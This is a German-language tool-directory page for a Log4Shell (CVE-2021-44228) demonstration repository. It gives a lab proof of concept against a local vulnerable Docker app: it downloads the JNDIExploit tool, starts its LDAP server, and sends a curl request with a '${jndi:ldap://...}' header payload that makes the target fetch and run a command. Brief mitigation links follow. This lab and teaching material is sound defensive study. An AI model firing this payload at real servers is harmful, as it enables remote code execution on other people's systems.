Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Log4Shell — Dieses Repository dient der Demonstration und Abschwächung der Log4j-2021-Schwachstelle (CVE-2021-44228). | Kitploit
Tools/GitHubGitHub/feryaeljustice/log4shell
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungLabs & Praxis
GitHubferyaeljustice/log4shell

Log4Shell

Dieses Repository dient der Demonstration und Abschwächung der Log4j-2021-Schwachstelle (CVE-2021-44228).

Repository anzeigen
vor 4 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Log4Shell

Dieses Repository dient der Demonstration und Abschwächung der Log4j-2021-Schwachstelle (CVE-2021-44228).

Was ist Log4Shell?

Die Schwachstelle CVE-2021-44228 / Log4Shell besteht darin, verwundbare Software mit einer bösartigen Nutzlast zu injizieren, die Log4J dazu auffordert, einen Wert von einer Drittanbieterquelle über JNDI und das LDAP-Protokoll abzurufen. ... Die importierten Daten können Code sein, der von Log4J auf dem System ausgeführt wird.

Proof of Concept (VIDEO-TUTORIAL)

  1. Wir führen eine Spring-Boot-Webanwendung aus, die in Docker anfällig für CVE-2021-44228 ist, von @christophetd als Log4Shell bezeichnet. Sie verwendet Log4j 2.14.1 (über spring-boot-starter-log4j2 2.6.1) und das JDK 1.8.0_181. docker run --name vulnerable-app --rm -p 8080:8080 ghcr.io/christophetd/log4shell-vulnerable-app Log4Shell_1 Log4Shell_2

  • Wir laden den JNDI-Exploit für Log4Shell in diesem Fall aus dem Webarchiv herunter, aber du kannst ihn von überall herunterladen, wo er verfügbar ist. wget https://web.archive.org/web/20211211031401/https://github.com/feihong-cs/JNDIExploit/releases/download/v1.2/JNDIExploit.v1.2.zip Log4Shell_3 Log4Shell_4

  • Wir ermitteln die IP-Adresse unseres Rechners, auf dem der Docker-Container der Log4Shell-Anwendung läuft. ifconfig Log4Shell_IP

  • Wir entpacken das ZIP mit dem JNDI-Exploit für Log4Shell, erhalten so das JAR und führen es mit der in Schritt 3 ermittelten IP aus.

  • root@kitploit:~
    unzip JNDIExploit.v1.2.zip
    java -jar JNDIExploit-1.2-SNAPSHOT.jar -i your-private-ip -p 8888
    

    Log4Shell_5

    1. Danach lösen wir den Exploit aus mit: curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://your-private-ip:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=}' Log4Shell_6
    • Wir sehen, dass wir eine JNDI-Verbindung zu unserem Rechner haben, und wir können den von Log4J ausgeführten Code sehen. Log4Shell_7
    1. Um zu bestätigen, dass die Codeausführung erfolgreich war, beachte, dass die Datei /tmp/pwned.txt im Container erstellt wurde, der die verwundbare Anwendung ausführt. docker exec vulnerable-app ls /tmp Log4Shell_8

    Abschwächung

    Video zur Abschwächung der Log4Shell-Schwachstelle unter Windows und Linux: ABSCHWÄCHUNG

    Abschwächung unter Linux (Beispielbild)

    MITIGATION

    Autor

    Feryael Justice 2022

    Tool herunterladen